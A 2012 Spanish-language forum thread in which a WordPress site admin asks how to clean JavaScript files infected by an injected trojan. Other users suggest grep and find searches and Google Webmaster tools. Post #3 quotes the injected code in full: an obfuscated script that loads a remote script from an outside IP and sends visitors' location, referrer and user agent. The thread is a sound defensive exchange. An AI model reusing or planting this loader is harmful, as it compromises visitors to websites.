Archivos *.js infectados con código malicioso

osowaken · #1 (**permalink**) 16/02/2012, 07:42

Hola a todos!

Aprovecho para presentarme por que soy novato en el foro. Soy Osowaken, administrador de la web www.antesmuertoqueserunzombi.es una web dedicada al cine fantástico y de terror entre otros muchas temáticas!

El caso es que nuestra web esta alojada en un servidor compartido de 1and1 y corre sobre Wordpress 3.3.1

El tema es que hemos sufrido muchos ataques y los dos últimos consisten en que nos han infectado con código malicioso todos los archivos *.js

Además de que es una chapa ir buscando archivo a archivo dentro del server todos los archivos que son de javascript y borrando uno a uno las líneas de código malicioso, me gustaría saber como puedo encontrar el script que se encarga de despertar a este troyano que se propaga por dentro del server que da miedo...

No sé que troyano es, por que no aparece en todos los antivirus, es más solo canta en el Avast y en Nod32.... y simplemente aparece una página web que te enlaza al dominio "psilondesig.osa.pl" y que google te advierte que tiene código chungo... Estoy desesperado por que no hago otra cosa que incrementar la seguridad en la web pero al final los resultados son nefastos....

Alguien podría echarme un cable?

Muchas gracias por vuestra atención!

Un saludo

#2 (**permalink**) 16/02/2012, 08:40

Pues con acceso ssh deberías poder encontrar las cadenas de texto que están en esos archivos (con grep).

grep -R lo_que_buscas *.js

Si el código malicioso no está ofuscado, quizás una búsqueda por el dominio "psilondesig.osa.pl" te de resultados. Si está ofuscado, aún podrías tener alguna oportunidad buscando llamadas a "eval", ya que usualmente no es usado por código "buenicioso" :D

find /carpeta/ -name "*.js" -exec grep eval {} +

debería devolverte todas las líneas conteniendo "eval" en todos los archivos javascript dentro de /carpeta

Saludos y suerte!

osowaken · #3 (**permalink**) 16/02/2012, 13:25

Cita:

Iniciado por AlvaroG

Pues con acceso ssh deberías poder encontrar las cadenas de texto que están en esos archivos (con grep).

grep -R lo_que_buscas *.js

Si el código malicioso no está ofuscado, quizás una búsqueda por el dominio "psilondesig.osa.pl" te de resultados. Si está ofuscado, aún podrías tener alguna oportunidad buscando llamadas a "eval", ya que usualmente no es usado por código "buenicioso" :D

find /carpeta/ -name "*.js" -exec grep eval {} +

debería devolverte todas las líneas conteniendo "eval" en todos los archivos javascript dentro de /carpeta

Saludos y suerte!

Hey! muchas gracias por la respuesta.... Luego intentaré buscarlo a ver que puedo hacer así!
El caso es que sigo borrando el contenido de los archivos *.js de forma manual....
El código que aparece dentro de cada *.js es el siguiente:

Código:

var _0x80d0=["\x64\x67\x6C\x6C\x68\x67\x75\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x32\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0x80d0[1]](_0x80d0[0]);if(!element){dawdafraawegdhdhd=document[_0x80d0[2]];gfjlhggfdghdd=escape(document[_0x80d0[3]]);hgfjkgkffgsdgd=escape(navigator[_0x80d0[4]]);var js=document[_0x80d0[6]](_0x80d0[5]);js[_0x80d0[7]]=_0x80d0[0];js[_0x80d0[8]]=_0x80d0[9]+gfjlhggfdghdd+_0x80d0[10]+dawdafraawegdhdhd+_0x80d0[11]+hgfjkgkffgsdgd;var head=document[_0x80d0[13]](_0x80d0[12])[0];head[_0x80d0[14]](js);} ;

A alguien le a sucedido algo por el estilo?

Gracias a todos!

#4 (**permalink**) 16/02/2012, 13:55

Bueno, creo que no hay eval() allí, jeje, pero podés usar 0x80d0 como término de búsqueda, después de todo no creo que lo hayas usado en tu código

Saludos.

Lecquio · #5 (**permalink**) 16/02/2012, 16:49

A mi me ha pasado en alguna web y la forma más fácil y rápida de localizar el código malicioso es dar de alta tu página en google webmaster. Te hace un análisis de la página y te dice cuales son todos los ficheros infectados y el código que sobra para que puedas localizarlo todo facilmente.